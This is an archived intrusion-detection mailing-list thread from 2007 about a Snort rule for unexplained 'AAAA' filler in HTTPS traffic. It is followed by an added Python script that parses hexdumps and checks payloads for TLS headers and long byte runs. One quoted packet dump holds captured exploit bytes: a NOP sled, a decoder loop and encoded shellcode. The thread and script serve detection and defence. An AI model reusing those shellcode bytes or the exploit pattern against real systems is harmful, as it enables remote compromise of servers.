RE: New sig for unknown bot: msg#00152

security.ids.snort.bleedingsnort

Subject: RE: New sig for unknown bot

I think that the packet data is consistent with a known W32.Sagevo
exploit. I am looking for the full content right now:

12:50:37.302768 IP ip-65-75-20-39.ct.dsl.ntplx.com.4516 >
192.168.81.2.2967: . 1:1461(1460) ack 1 win 17520
0x0000: 4500 05dc 3df0 4000 7506 5b0f 414b 1427 E...=.@.u.[.AK.'
0x0010: c0a8 5102 11a4 0b97 ee02 0319 8da7 24bc ..Q...........$.
0x0020: 5010 4470 d8ed 0000 0110 0f20 0a00 0000 P.Dp............
0x0030: 0218 0001 0000 0000 0024 0014 b7c9 d2d9 .........$......
0x0040: 3e33 ef34 251f 4300 0202 5c2f 6161 6161 >3.4%.C...\/aaaa
0x0050: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0060: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0070: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0080: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

-----Original Message-----
From: bleeding-sigs-bounces-WwB1pFISwSkm7effSn6vN9HuzzzSOjJt@xxxxxxxxxxxxxxxx
[mailto:bleeding-sigs-bounces-WwB1pFISwSkm7effSn6vN9HuzzzSOjJt@xxxxxxxxxxxxxxxx]
On Behalf Of Matt Jonkman
Sent: Monday, January 22, 2007 8:56 AM
To: Bleeding Sigs
Subject: Re: [Bleeding-sigs] New sig for unknown bot

What kind of web servers is it hitting? IIS, apache?

You able to grab a full session?

Matt

Jack Pepper wrote:
I don't know what's causing this, but that's just due to my own
laziness. I am seeing this on several https web servers. A long sled
of AA fillers in an https session? I don't think so. There is no chance
that https encryption could produce all these AAAAA.

The sig:

# Snort reads a rule as one line; the backslashes are line continuations.
# flow:established,to_server restricts the match to the client-to-server
# half of the session, which is the direction the header already targets.
alert tcp $EXTERNAL_NET any -> $HOME_NET 443 ( \
    msg:"BLEEDING-EDGE VIRUS incoming"; flow:established,to_server; \
    content:"AAAAAAAAAAAAAAAAAAAAAAA"; classtype:trojan-activity; \
    sid:xxxxxx; rev:1; )


The packet data:

19:19:05.584929 202.62.72.235.4957 > 192.168.1.26.https: .
0000 45 00 05 8c 98 d6 40 00 2d 06 da a9 ca 3e 48 eb  E.....@.-....>H.
0010 c0 a8 01 1a 13 5d 01 bb 80 42 0f 57 8a 2a b6 81  .....]...B.W.*..
0020 80 10 20 10 54 66 00 00 01 01 08 0a 00 c0 a7 fc  .. .Tf..........
0030 00 8c 69 f9 90 90 90 90 90 90 90 90 90 90 90 90  ..i.............
0040 90 90 90 90 eb 0e 5a 4a 31 c9 b1 99 80 34 11 fa  ......ZJ1....4..
0050 e2 fa eb 05 e8 ed ff ff ff 13 7d fa fa fa a5 cb  ..........}.....
0060 33 4f fe 73 31 ab cb 33 4b f9 cb 28 cb 3a 4a cd  3O.s1..3K..(.:J.
0070 37 7a 73 3c 73 38 7a 34 f2 bb cb 3a 4a cd 37 7a  7zs<s8z4...:J.7z
0080 73 30 77 b5 f2 73 2a b2 37 7a 73 2b 73 08 cb 3a  s0w..s*.7zs+s..:
0090 4a cd 37 7a a3 7b 85 f2 94 9f 8c 9f 8e fe 18 39  J.7z.{.........9
00a0 11 47 cb 3a aa 92 8d ca ca 8e 73 1b 4a fe 73 38  .G.:......s.J.s8
00b0 37 7a cb 33 cb 3a 4a c5 37 7a bb cb 3a 4a c5 37  7z.3.:J.7z..:J.7
00c0 7a bb cb 3a 4a c5 37 7a 73 01 73 a5 f2 cb 3a 73  z..:J.7zs.s...:s
00d0 bd f6 72 bd fd cb 28 77 b5 f2 4a f1 37 7a cb 21  ..r...(w..J.7z.!
00e0 73 22 ba 37 7a 12 8e 05 05 05 d5 98 93 94 d5 89  s".7z...........
00f0 92 c5 41 41 41 41 41 41 41 41 41 41 41 41 41 41  ..AAAAAAAAAAAAAA
0100 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0110 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0120 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0130 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0140 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0150 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0160 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0170 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0180 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0190 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
01a0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
01b0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
01c0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
01d0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
01e0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
01f0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0200 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0210 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0220 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0230 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0240 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0250 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0260 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0270 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0280 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0290 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
02a0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
02b0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
02c0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
02d0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
02e0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
02f0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0300 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0310 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0320 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0330 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0340 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0350 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0360 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0370 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0380 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0390 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
03a0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
03b0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
03c0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
03d0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
03e0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
03f0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0400 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0410 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0420 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0430 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0440 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0450 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0460 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0470 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0480 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0490 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
04a0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
04b0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
04c0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
04d0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
04e0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
04f0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0500 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0510 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0520 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0530 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0540 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0550 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0560 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0570 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0580 41 41 41 41 41 41 41 41 41 41 41 41              AAAAAAAAAAAA....


-------------------------------------------------
Email solutions, MS Exchange alternatives and extrication,
security services, systems integration.
Contact: services-MMNQ1ylbVXZN8Ch2cx6nig@xxxxxxxxxxxxxxxx


_______________________________________________
Bleeding-sigs mailing list
Bleeding-sigs-WwB1pFISwSkm7effSn6vN9HuzzzSOjJt@xxxxxxxxxxxxxxxx
http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs

--
--------------------------------------------
Matthew Jonkman
Bleeding Edge Threats
765-429-0398
765-807-3060 fax
http://www.bleedingthreats.net
--------------------------------------------

PGP: http://www.bleedingthreats.com/mattjonkman.asc


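The argument in the thread is that an https session cannot legitimately carry a long run of identical bytes, so the 'AAAA' match on port 443 is cheap evidence of cleartext filler. The script below is an added example, not code from the thread or from Bleeding Edge Threats: it rebuilds a packet from a hexdump in the same layout as the one quoted, strips the IPv4 and TCP headers using their own length fields, and applies the two checks a defender would want before trusting that match: does the payload start with a TLS/SSLv3 (or SSLv2-style) record header, and how long is its longest single-byte run? The first rows of SUSPECT_DUMP are from the quoted capture; the 0x41 rows and the whole TLS_DUMP packet are constructed sample data.

```python
import re
from itertools import groupby
# Rows 0000-0040 are the header and NOP-sled rows of the dump quoted in the thread;
# rows 0050-0060 are constructed 0x41 filler standing in for the long run of 'A's.
SUSPECT_DUMP = """\
0000 45 00 05 8c 98 d6 40 00 2d 06 da a9 ca 3e 48 eb E.....@.-....>H.
0010 c0 a8 01 1a 13 5d 01 bb 80 42 0f 57 8a 2a b6 81 .....]...B.W.*..
0020 80 10 20 10 54 66 00 00 01 01 08 0a 00 c0 a7 fc .. .Tf..........
0030 00 8c 69 f9 90 90 90 90 90 90 90 90 90 90 90 90 ..i.............
0040 90 90 90 90 eb 0e 5a 4a 31 c9 b1 99 80 34 11 fa ......ZJ1....4..
0050 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0060 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
"""
# Constructed comparison packet: a TLS 1.2 application-data record to port 443.
TLS_DUMP = """\
0000 45 00 00 3d 00 01 40 00 40 06 00 00 c0 a8 01 05 E..=..@.@.......
0010 c0 a8 01 1a c3 50 01 bb 00 00 00 01 00 00 00 00 .....P..........
0020 50 18 ff ff 00 00 00 00 17 03 03 00 10 9f 3c 7a P.............<z
0030 11 0e 58 d2 a6 4b 77 c1 e9 05 8d 62 f0          ..X..Kw....b.
"""
ROW = re.compile(r"^([0-9a-f]{4})((?:\s[0-9a-f]{2}){1,16})")  # offset, then up to 16 bytes

def parse_hexdump(text):
    """Rebuild raw bytes from 'offset hex... ascii' rows; the ASCII column is ignored."""
    rows = (ROW.match(line.strip()) for line in text.splitlines())
    return b"".join(bytes.fromhex(m.group(2)) for m in rows if m)

def tcp_payload(pkt):
    """Strip the IPv4 and TCP headers using their own length fields; None if not TCP."""
    if len(pkt) < 40 or pkt[9] != 6: return None
    ihl = (pkt[0] & 0x0F) * 4
    return pkt[ihl + (pkt[ihl + 12] >> 4) * 4:]

def looks_like_tls(p):
    """True for a TLS/SSLv3 record header (type 0x14-0x17, version 3.x) or an SSLv2 CLIENT-HELLO."""
    if len(p) < 5: return False
    return (0x14 <= p[0] <= 0x17 and p[1] == 3 and p[2] <= 3) or (bool(p[0] & 0x80) and p[2] == 1)

def longest_run(p):
    """Longest run of one repeated byte; NOP sleds (0x90) and 'A' (0x41) filler score high."""
    return max(len(list(g)) for _, g in groupby(p)) if p else 0

def classify(text, min_run=23):
    """min_run=23 mirrors the 23 'A's in the content match of the posted Snort rule."""
    p = tcp_payload(parse_hexdump(text))
    if p is None: return "not-tcp"
    if looks_like_tls(p): return "tls"
    return "filler-on-443" if longest_run(p) >= min_run else "unknown-cleartext"
```

Note that the record-header check is what separates the two samples: the quoted capture starts its TCP payload with 0x90 NOPs, which no SSL/TLS record layer would produce, while a real session on 443 starts with a record header even when its ciphertext happens to repeat bytes.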

